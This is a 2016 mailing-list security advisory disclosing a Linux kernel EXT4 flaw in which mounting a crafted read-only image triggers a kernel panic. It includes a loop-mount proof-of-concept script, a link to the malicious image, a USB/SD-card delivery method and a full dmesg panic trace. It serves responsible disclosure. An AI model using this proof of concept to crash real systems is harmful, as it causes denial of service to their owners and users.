[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

OS-S 2016-23 - Local DoS: Linux Kernel EXT4 Error Handling (EXT4 calling panic())



OS-S Security Advisory 2016-23
Local DoS: Linux Kernel EXT4 Error Handling (EXT4 calling panic())

Date:
October 31th, 2016
Authors:
Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE:
Not yet assigned
CVSS:
4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Severity:
Critical
Ease of Exploitation:
Trivial
Vulnerability Type:
Error handling leads to conscious panic() call

Abstract:
Mounting a crafted EXT4 image as read-only leads to a kernel panic.
Since the mounting procedure is a privileged operation, an attacker is
probably not able to trigger this vulnerability on the commandline.
Instead the automatic mounting feature of the GUI via a crafted
USB-device is required.

Detailed product description:
We have verified the bug on the following kernel builds:
 Ubuntu Server 16.10 (GNU/Linux 4.8.0-22-generic x86_64)
 RedHat Kernel 3.10.0-327.18.2.el7.x86_64

Vendor Communication:
We contacted RedHat on May, 03th 2016.
To this day, no security patch was provided by the vendor.
We publish this Security Advisory in accordance with our responsible
disclosure policy.

Reference: https://bugzilla.redhat.com/show_bug.cgi?id=1332506

Proof of Concept:
As a proof of concept, we are providing the image that is causing a
panic() call. For demonstration purposes a script to mount this
filesystem is also attached.

Severity and Ease of Exploitation:
The vulnerability can be easily exploited as a Denial-of-Service
remotely by using a USB-device. In this case the attacker must copy this
image (e.g. using dd) to a device or storage such as a SD-card which can
be set to read-only mode (using the write-protection switch).

Mount-Script:
cp ext4_fs_file /tmp/
mkdir /tmp/a
sudo losetup /dev/loop0 /tmp/ext4_fs_file
sudo mount -o ro /dev/loop0 /tmp/a

Malicious EXT4-Image (BASE64 Encoded):
https://os-s.net/advisories/OSS-2016-23-image


dmesg-Report:
/ # ./mount.sh
[   11.269750] EXT4-fs (loop0): Unrecognized mount option "" or missing
value
[   11.278081] EXT4-fs (loop0): failed to parse options in superblock:
[   11.286825] EXT4-fs: Warning: mounting with data=journal disables
delayed allocation and O_DIRECT support!
[   11.295852] EXT4-fs warning (device loop0): ext4_fill_super:3568:
fragment/cluster size (0) != block size (1024)
[   11.304393] EXT4-fs (loop0): ext4_check_descriptors: Checksum for
group 0 failed (58173!=0)
[   11.317625] EXT4-fs (loop0): revision level too high, forcing
read-only mode
[   11.327470] EXT4-fs (loop0): orphan cleanup on readonly fs
[   11.332096] EXT4-fs error (device loop0): ext4_get_group_desc:288:
comm mounter: block_group >= groups_count - block_group = 1023983,
groups_count = 1
[   11.353372] Kernel panic - not syncing: EXT4-fs (device loop0): panic
forced after error
[   11.353372]
[   11.361499] CPU: 0 PID: 143 Comm: mounter Tainted: G           OE
4.6.0-rc6 #5
[   11.369343] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[   11.378184]  ffff88002155d710 ffff88002103f6f8 ffffffff819fdf81
ffffffffc019e240
[   11.384350]  ffff88002103f7d0 ffff88002103f7c0 ffffffff814643fc
0000000041b58ab3
[   11.390465]  ffffffff82f1fcbb ffffffff81464272 0000000000000000
ffff880000000010
[   11.396134] Call Trace:
[   11.398812]  [<ffffffff819fdf81>] dump_stack+0x63/0x82
[   11.410022]  [<ffffffff814643fc>] panic+0x18a/0x2ef
[   11.415285]  [<ffffffff81464272>] ? set_ti_thread_flag+0xf/0xf
[   11.422216]  [<ffffffff8166d48c>] ? __sync_dirty_buffer+0x14c/0x1a0
[   11.427425]  [<ffffffffc0104e78>]
ext4_handle_error.part.190+0x298/0x2e0 [ext4]
[   11.433536]  [<ffffffffc0104fc6>] __ext4_error+0x106/0x1b0 [ext4]
[   11.438436]  [<ffffffffc0104ec0>] ?
ext4_handle_error.part.190+0x2e0/0x2e0 [ext4]
[   11.444580]  [<ffffffff8125f36a>] ? vprintk_default+0x5a/0x90
[   11.449308]  [<ffffffff81570fb6>] ? kasan_unpoison_shadow+0x36/0x50
[   11.459341]  [<ffffffff81464823>] ? power_down+0xc4/0xc4
[   11.463704]  [<ffffffff8170752b>] ? proc_alloc_inum+0x8b/0x170
[   11.468337]  [<ffffffff817074a0>] ? __proc_create+0x5a0/0x5a0
[   11.476158]  [<ffffffffc0069cb6>] ext4_get_group_desc+0x1f6/0x2e0 [ext4]
[   11.481386]  [<ffffffffc0103d0c>] ? __ext4_msg+0x13c/0x150 [ext4]
[   11.486315]  [<ffffffffc0077a33>] ext4_read_inode_bitmap+0x23/0x14c0
[ext4]
[   11.491811]  [<ffffffffc007d76f>] ext4_orphan_get+0xff/0x4e0 [ext4]
[   11.501660]  [<ffffffffc0191ffd>] ? ext4_register_sysfs+0x1ad/0x290
[ext4]
[   11.507700]  [<ffffffffc010c9ef>] ?
ext4_register_li_request+0xdf/0x740 [ext4]
[   11.515257]  [<ffffffffc01181e6>] ext4_fill_super+0x8936/0x9ab0 [ext4]
[   11.521387]  [<ffffffffc010f8b0>] ?
ext4_calculate_overhead+0xd00/0xd00 [ext4]
[   11.532063]  [<ffffffff81a29000>] ? pointer+0xa70/0xa70
[   11.541636]  [<ffffffff8157102e>] ? kasan_kmalloc+0x5e/0x70
[   11.546815]  [<ffffffff8156d04b>] ? __kmalloc+0xeb/0x230
[   11.551595]  [<ffffffff814a3604>] ? register_shrinker+0x84/0x1e0
[   11.558138]  [<ffffffff81a2ad28>] ? snprintf+0x88/0xa0
[   11.562158]  [<ffffffff81a2aca0>] ? vsprintf+0x20/0x20
[   11.566260]  [<ffffffff815c8cf0>] ? ns_test_super+0x60/0x60
[   11.570504]  [<ffffffff815cb8a5>] mount_bdev+0x275/0x320
[   11.574572]  [<ffffffffc010f8b0>] ?
ext4_calculate_overhead+0xd00/0xd00 [ext4]
[   11.586625]  [<ffffffffc00cd5e5>] ext4_mount+0x15/0x20 [ext4]
[   11.591910]  [<ffffffff815cce31>] mount_fs+0x81/0x2c0
[   11.597510]  [<ffffffff8161ef5b>] vfs_kern_mount+0x6b/0x330
[   11.604139]  [<ffffffff81626c28>] do_mount+0x428/0x28b0
[   11.608389]  [<ffffffff814c553e>] ? strndup_user+0x4e/0xc0
[   11.612704]  [<ffffffff81626800>] ? copy_mount_string+0x20/0x20
[   11.623559]  [<ffffffff8157102e>] ? kasan_kmalloc+0x5e/0x70
[   11.629014]  [<ffffffff81571352>] ? kasan_slab_alloc+0x12/0x20
[   11.636190]  [<ffffffff815702cf>] ? __kmalloc_track_caller+0xbf/0x210
[   11.641408]  [<ffffffff814c553e>] ? strndup_user+0x4e/0xc0
[   11.645754]  [<ffffffff814c5422>] ? memdup_user+0x42/0x70
[   11.650056]  [<ffffffff81629c45>] SyS_mount+0x95/0xe0
[   11.653852]  [<ffffffff82869a36>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[   11.666389] Kernel Offset: disabled
[   11.670125] Rebooting in 1 seconds..

-- 
OpenSource Training Ralf Spenneberg     http://www.os-t.de
Am Bahnhof 3-5                          48565 Steinfurt         Germany
Fon: +49(0)2552 638 755                 Fax: +49(0)2552 638 757